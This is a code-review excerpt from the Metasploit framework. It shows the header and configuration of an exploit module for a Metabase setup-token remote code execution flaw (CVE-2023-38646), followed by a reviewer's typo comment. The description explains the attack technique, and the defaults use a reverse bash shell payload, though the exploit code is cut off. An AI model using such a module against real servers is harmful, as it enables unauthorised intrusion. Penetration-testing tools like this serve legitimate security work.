modules/exploits/linux/http/metabase_setup_token_rce.rb

```diff
@@ -0,0 +1,159 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  prepend Msf::Exploit::Remote::AutoCheck
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Metabase Setup Token RCE',
+        'Description' => %q{
+          Metabase versions before 0.46.6.1 contain a flaw where the secret setup-token
+          is accessible even after the setup process has been completed. With this token
+          a user is able to submit the setup functionality to create a new database.
+          When creating a new database, an H2 database string is created with a TRIGGER
+          that allows for code execution. We use a sample database for our connection
+          string to prevent corrupting real databases.
+
+          Successfully tested against Metabase 0.46.6.
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
+          'h00die', # msf module
+          'Maxwell Garrett', # original PoC, analysis
+          'Shubham Shah' # original PoC, analysis
+        ],
+        'References' => [
+          ['URL', 'https://blog.assetnote.io/2023/07/22/pre-auth-rce-metabase/'],
+          ['URL', 'https://www.metabase.com/blog/security-advisory'],
+          ['CVE', '2023-38646']
+        ],
+        'Platform' => ['unix'],
+        'Privileged' => false,
+        'Arch' => ARCH_CMD,
+        'DefaultOptions' => {
+          'PAYLOAD' => 'cmd/unix/reverse_bash'
+          # for docker payload/cmd/unix/reverse_netcat also works, but no perl/python
+        },
+        'Targets' => [
+          [ 'Automatic Target', {}]
+        ],
+        'DisclosureDate' => '2023-07-22',
+        'DefaultTarget' => 0,
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [IOC_IN_LOGS]
+        }
+      )
+    )
+    register_options(
+      [
+        Opt::RPORT(3000),
+        OptString.new('TARGETURI', [ true, 'The URI of the Metabase Application', '/'])
+      ]
+    )
+  end
+
+  def get_boostrab_json_blob_from_html_resp(html)
```

Comment:
```suggestion
  def get_boostrap_json_blob_from_html_resp(html)
```

Reply:
`booTstrap` actually :) (capital for emphasis)